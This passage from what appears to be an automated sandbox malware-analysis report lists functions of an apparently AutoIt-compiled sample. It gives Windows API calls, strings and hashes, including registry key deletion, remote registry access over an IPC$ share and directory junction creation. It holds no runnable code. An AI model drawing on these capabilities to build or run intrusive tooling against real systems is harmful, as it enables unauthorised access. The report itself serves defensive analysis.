GetMenuItemCount.USER32(?), ref: 007A8EEC
GetMenuItemID.USER32(?,00000000), ref: 007A8EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 007A8F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 007A8F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007A8FA1

Strings

0, xrefs: 007A8E9F

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: 6ba555060f2512a83b60f7833924ee8afa5c597178dff9f10678775c75d60960
Instruction ID: 2bd7b758730efca4f8629cfe2c7b11ceeb62cee20ac0eef4fa929ded57b2b8e8
Opcode Fuzzy Hash: 6ba555060f2512a83b60f7833924ee8afa5c597178dff9f10678775c75d60960
Instruction Fuzzy Hash: B981BF71508301EFDB51CF24D888AABBBE9FBCA314F144A5DF99497291DB38D900CB62

Function 0077DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 0077DC20
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0077DC46
_wcslen.LIBCMT ref: 0077DC50
_wcsstr.LIBVCRUNTIME ref: 0077DCA0
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0077DCBC

Strings

04090000, xrefs: 0077DCF2
StringFileInfo\, xrefs: 0077DC8F
DefaultLangCodepage, xrefs: 0077DD1F
\VarFileInfo\Translation, xrefs: 0077DCB4
%u.%u.%u.%u, xrefs: 0077DD9A

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: d3d737ba4d4a06131e8791f111ecb0367079efd33923ea00690bbe353e267480
Instruction ID: 41aecd8a22fb15f4e3362651ae591b2ef1fa9607a00caf5b75987722fa640cda
Opcode Fuzzy Hash: d3d737ba4d4a06131e8791f111ecb0367079efd33923ea00690bbe353e267480
Instruction Fuzzy Hash: A7413872A00210BAEB25A7749C4BEBF377CEF42750F10406AF904A2183EB7D9D0197A5

Function 0079CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0079CC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0079CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0079CD48

Part of subcall function 0079CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0079CCAA
Part of subcall function 0079CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0079CCBD
Part of subcall function 0079CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0079CCCF
Part of subcall function 0079CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0079CD05
Part of subcall function 0079CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0079CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 0079CCF3

Strings

RegDeleteKeyExW, xrefs: 0079CCC9
advapi32.dll, xrefs: 0079CCB8

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 58e169e97069616d224fbc28461a152562e840171f07749c4c9fd59011c9b10a
Instruction ID: a63672db045f136fd85fd1487ff8c56c669713044f75bb7298e0b8f5f4807505
Opcode Fuzzy Hash: 58e169e97069616d224fbc28461a152562e840171f07749c4c9fd59011c9b10a
Instruction Fuzzy Hash: C63160B1A01129BBDF228B54EC88EFFBB7CEF46750F004165F905E6240D6389E45DAB4

Function 00783D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00783D40
_wcslen.LIBCMT ref: 00783D6D
CreateDirectoryW.KERNEL32(?,00000000), ref: 00783D9D
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00783DBE
RemoveDirectoryW.KERNEL32(?), ref: 00783DCE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00783E55
CloseHandle.KERNEL32(00000000), ref: 00783E60
CloseHandle.KERNEL32(00000000), ref: 00783E6B

Strings

:, xrefs: 00783D82
\, xrefs: 00783D77
\??\%s, xrefs: 00783D5B

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: 6d6cc309248cf78872c0e4499fbd14f1886cceb70334834f2d1a0bc7b35b3088
Instruction ID: 660c9a330f12500435ef8bb9b071ad2757052d5227faab6c6779f19a514d973c
Opcode Fuzzy Hash: 6d6cc309248cf78872c0e4499fbd14f1886cceb70334834f2d1a0bc7b35b3088
Instruction Fuzzy Hash: 3231B471A40119BBDB21ABA4DC49FEF37BCEF89B00F1040B5F505D6151EB7897458B24

Function 0077E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0077E6B4

Part of subcall function 0072E551: timeGetTime.WINMM(?,?,0077E6D4), ref: 0072E555

Sleep.KERNEL32(0000000A), ref: 0077E6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0077E705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0077E727
SetActiveWindow.USER32 ref: 0077E746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0077E754
SendMessageW.USER32(00000010,00000000,00000000), ref: 0077E773
Sleep.KERNEL32(000000FA), ref: 0077E77E
IsWindow.USER32 ref: 0077E78A
EndDialog.USER32(00000000), ref: 0077E79B

Strings

BUTTON, xrefs: 0077E719

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 993587705f88a52d6687f4e800783f540a6df186af052a5903f9bfcd1c07ed30
Instruction ID: 74d56d9d27ecbd12462fe3f6c4273f3e61cd924b960b7103ff96781692dbb6a9
Opcode Fuzzy Hash: 993587705f88a52d6687f4e800783f540a6df186af052a5903f9bfcd1c07ed30
Instruction Fuzzy Hash: BF2184B0301245BFEF015F24ECC9A253B6DF79D389B10C465F509C55A2DBBDAC119A6C

Function 0077E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0077EA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0077EA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0077EA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0077EA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0077EAA7

Strings

status PlayMe mode, xrefs: 0077EA58
alias PlayMe, xrefs: 0077EA36
close PlayMe, xrefs: 0077EA6E, 0077EA9B
play PlayMe, xrefs: 0077EAA2
play PlayMe wait, xrefs: 0077EA91
open , xrefs: 0077EA0C

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: dc8b0c8c958da0494d2b12b2e5bd4c4159c3bf0a763ddeca7c3fcac0121e50cf
Instruction ID: 342595b667d5a48f4992cdaad74addaccd65374cbdfddc172ce18fd6857fed3b
Opcode Fuzzy Hash: dc8b0c8c958da0494d2b12b2e5bd4c4159c3bf0a763ddeca7c3fcac0121e50cf
Instruction Fuzzy Hash: 5711C671A50219B9DB20A7A5DC5ADFF6B7CEBD5F40F00442AB815A20D0EE782E45C5B0

Function 00775CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00775CE2
GetWindowRect.USER32(00000000,?), ref: 00775CFB
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00775D59
GetDlgItem.USER32(?,00000002), ref: 00775D69
GetWindowRect.USER32(00000000,?), ref: 00775D7B
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00775DCF
GetDlgItem.USER32(?,000003E9), ref: 00775DDD
GetWindowRect.USER32(00000000,?), ref: 00775DEF
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00775E31
GetDlgItem.USER32(?,000003EA), ref: 00775E44
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00775E5A
InvalidateRect.USER32(?,00000000,00000001), ref: 00775E67

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 5f1c3069313b18bd95384a4c04f19d248a823568df520585c285669abc4b9338
Instruction ID: da4c34ed71b9b7bcdc6e471035cfdaacab6c5b67fef080ffd939503cc2cb7dac
Opcode Fuzzy Hash: 5f1c3069313b18bd95384a4c04f19d248a823568df520585c285669abc4b9338
Instruction Fuzzy Hash: 0B510E71B00605AFDF19CF68DD89AAEBBB5FB88340F148229F519E7290D7B49E04CB50

Function 00728BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00728F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00728BE8,?,00000000,?,?,?,?,00728BBA,00000000,?), ref: 00728FC5

DestroyWindow.USER32(?), ref: 00728C81
KillTimer.USER32(00000000,?,?,?,?,00728BBA,00000000,?), ref: 00728D1B
DestroyAcceleratorTable.USER32(00000000), ref: 00766973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00728BBA,00000000,?), ref: 007669A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00728BBA,00000000,?), ref: 007669B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00728BBA,00000000), ref: 007669D4
DeleteObject.GDI32(00000000), ref: 007669E6

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 15edd979b51235ebf9f8e73cddcc28a73998165aeb65717879ac996720e6f53a
Instruction ID: 806e62fe21244b42d05081aaeb0594f06c8dc144e0111865dc50edfa3495d1ff
Opcode Fuzzy Hash: 15edd979b51235ebf9f8e73cddcc28a73998165aeb65717879ac996720e6f53a
Instruction Fuzzy Hash: A161BD30103760DFCB629F14EA49B2A77F1FB44312F95855CE4429A560CB3EB880CFA6

Function 00729838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00729944: GetWindowLongW.USER32(?,000000EB), ref: 00729952

GetSysColor.USER32(0000000F), ref: 00729862

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 7835aafe431d30363b66c9f02048d9d1181407f626babc299413983b7dd7cf54
Instruction ID: 4d9f738a6cf78cea092895015859589f94ba7e4d424af10846e6d1ea95ffe4e4
Opcode Fuzzy Hash: 7835aafe431d30363b66c9f02048d9d1181407f626babc299413983b7dd7cf54
Instruction Fuzzy Hash: 0841D471500654AFDB255F38EC88BB93BA5EB57370F1C8645FAA28B1E2D7389C41DB10

Function 00748D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Strings

.s, xrefs: 0074903A, 00748FD0, 00748FF2

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID:
String ID: .s
API String ID: 0-1621786184
Opcode ID: 0a2c03f8e5a15180aabee92d8c4f41024f92b0465e446c58626dab10440bef17
Instruction ID: 5f24f82084dc2d8cb25200c8417c9dc9588f06d112c06876d3b777f25eb0c7f8
Opcode Fuzzy Hash: 0a2c03f8e5a15180aabee92d8c4f41024f92b0465e446c58626dab10440bef17
Instruction Fuzzy Hash: ACC1E475E0424AEFDF11DFA8D845BAEBBB0BF09310F144199F514AB3A2C7789941CB61

Function 007796E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0075F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00779717
LoadStringW.USER32(00000000,?,0075F7F8,00000001), ref: 00779720

Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0075F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00779742
LoadStringW.USER32(00000000,?,0075F7F8,00000001), ref: 00779745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00779866

Strings

^ ERROR, xrefs: 007797FB
%s (%d) : ==> %s: %s %s, xrefs: 0077984A
Error: , xrefs: 0077981D
Line %d (File "%s"):, xrefs: 0077978F
Line %d:, xrefs: 007797A0

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 53df448b6230e8fa5c7944394f7e5b2b8c5b892f940bb2cdb95bf672764ae247
Instruction ID: e1d34adf31fc0a5483b78541497c1a408c562206105c159e49f974ee0ea1b5df
Opcode Fuzzy Hash: 53df448b6230e8fa5c7944394f7e5b2b8c5b892f940bb2cdb95bf672764ae247
Instruction Fuzzy Hash: CB412C72801219EADF04EBE4DE9ADEEB778AF55340F504025F60572092EB396F89CB61

Function 007706DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00716B57: _wcslen.LIBCMT ref: 00716B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007707A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007707BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007707DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00770804
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0077082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00770837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0077083C

Strings

SOFTWARE\Classes\, xrefs: 0077070E
\IPC$, xrefs: 00770784
\CLSID, xrefs: 00770724

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 1730bb1184b533f6b04555e74676e42127a24534818df67221bcaf3ccb084bc8
Instruction ID: 3e84a2599c5ce989d04024ff7d96e5a74f2fff3331168affcda1f7820dc8f4d1
Opcode Fuzzy Hash: 1730bb1184b533f6b04555e74676e42127a24534818df67221bcaf3ccb084bc8
Instruction Fuzzy Hash: EC41FC71C10229EBDF15EB94DC99CEDB778FF44350F148126E915A31A1EB386E44CB90

Function 00793C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00793C5C
CoInitialize.OLE32(00000000), ref: 00793C8A
CoUninitialize.OLE32 ref: 00793C94
_wcslen.LIBCMT ref: 00793D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 00793DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 00793ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00793F0E
CoGetObject.OLE32(?,00000000,007AFB98,?), ref: 00793F2D
SetErrorMode.KERNEL32(00000000), ref: 00793F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00793FC4
VariantClear.OLEAUT32(?), ref: 00793FD8

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 45d4dca5080aab846e6abb0d921ded7caf8036c5df244bf06cd3a8cda3faedc7
Instruction ID: 12d05e6351322a7470e843501cedb6a979c10bda55cf6e0147376642a274fcea
Opcode Fuzzy Hash: 45d4dca5080aab846e6abb0d921ded7caf8036c5df244bf06cd3a8cda3faedc7
Instruction Fuzzy Hash: 16C13571608205EFDB00DF68D88492BBBE9FF89744F04491DF98A9B250D738EE45CB52

Function 00787A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00787AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00787B8F
SHGetDesktopFolder.SHELL32(?), ref: 00787BA3
CoCreateInstance.OLE32(007AFD08,00000000,00000001,007D6E6C,?), ref: 00787BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00787C74
CoTaskMemFree.OLE32(?,?), ref: 00787CCC
SHBrowseForFolderW.SHELL32(?), ref: 00787D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00787D7A
CoTaskMemFree.OLE32(00000000), ref: 00787D81
CoTaskMemFree.OLE32(00000000), ref: 00787DD6
CoUninitialize.OLE32 ref: 00787DDC

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: a23a7c6704f68bebfc1bdaf45afa275b1a2e55ee0e25e6fa98f5d3e39db45f4c
Instruction ID: a1ea3237c0ce135112af93e70a82eea2a6065efbe5b2ddffa36e4a590da1865b
Opcode Fuzzy Hash: a23a7c6704f68bebfc1bdaf45afa275b1a2e55ee0e25e6fa98f5d3e39db45f4c
Instruction Fuzzy Hash: 10C11B75A04109EFCB14DFA4C888DAEBBF9FF48314B148499E91A9B361D734ED81CB90

Function 007A541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 007A5504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007A5515
CharNextW.USER32(00000158), ref: 007A5544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 007A5585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 007A559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007A55AC

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
